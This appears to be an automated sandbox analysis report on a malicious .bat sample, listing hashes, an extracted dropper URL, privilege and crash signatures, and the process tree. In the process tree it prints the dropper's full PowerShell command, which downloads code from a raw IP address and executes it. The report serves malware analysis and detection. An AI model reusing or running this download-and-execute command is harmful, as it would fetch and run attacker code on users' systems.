Analysis
- max time kernel: 134s
- max time network: 79s
- platform: windows10_x64
- resource: win10v200430
- submitted: 15-05-2020 19:19
Static task
- static1

Behavioral task
- behavioral1
  - Sample: cf3b764eef05fd5d2eaf9b8b4a23a58a.bat
  - Resource: win7v200430 (windows7_x64)
  - 0 signatures
  - 0 seconds

Behavioral task
- behavioral2
  - Sample: cf3b764eef05fd5d2eaf9b8b4a23a58a.bat
  - Resource: win10v200430 (windows10_x64)
  - 0 signatures
  - 0 seconds
General
- Target: cf3b764eef05fd5d2eaf9b8b4a23a58a.bat
- Size: 221B
- MD5: f2a79e7b7a84b63ed4d4793e638c2d4f
- SHA1: 3c0fa1ed487cb193e5134b9631c6a041b190dc73
- SHA256: cc9bbb89609f9d78b7007196c3424b74594c2bc2db13fe336a1458b8bd8cbe7f
- SHA512: 8236bae5f48871d6ce3a1e4e50663ba551025598dbd5959acfef08ddc685ffdd45b45b3059e3261983504fa9ef027f1fc440491b2bcdfe9076f0b9c705003551
- Score: 10/10
Malware Config
- Extracted
  - Language: ps1
  - Source: ps1.dropper
  - URLs: http://185.103.242.78/pastes/cf3b764eef05fd5d2eaf9b8b4a23a58a
Signatures
- Program crash (1 IoC)
  Processes: WerFault.exe
  pid | pid_target | process | target process
  2080 | 1364 | WerFault.exe | powershell.exe
- Suspicious use of AdjustPrivilegeToken (3 IoCs)
  Processes: WerFault.exe
  description | pid | process
  Token: SeRestorePrivilege | 2080 | WerFault.exe
  Token: SeBackupPrivilege | 2080 | WerFault.exe
  Token: SeDebugPrivilege | 2080 | WerFault.exe
- Suspicious behavior: EnumeratesProcesses (14 IoCs)
  Processes: WerFault.exe
  pid | process
  2080 | WerFault.exe (14 entries, all the same pid and process)
Processes
1. C:\Windows\system32\cmd.exe (PID 3568)
   Command line: C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\cf3b764eef05fd5d2eaf9b8b4a23a58a.bat"
   2. C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 1364)
      Command line: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/cf3b764eef05fd5d2eaf9b8b4a23a58a');Invoke-UGWHYUXKHTPVLS;Start-Sleep -s 10000"
      3. C:\Windows\SysWOW64\WerFault.exe (PID 2080)
         Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 1364 -s 704
         Signatures:
         - Program crash
         - Suspicious use of AdjustPrivilegeToken
         - Suspicious behavior: EnumeratesProcesses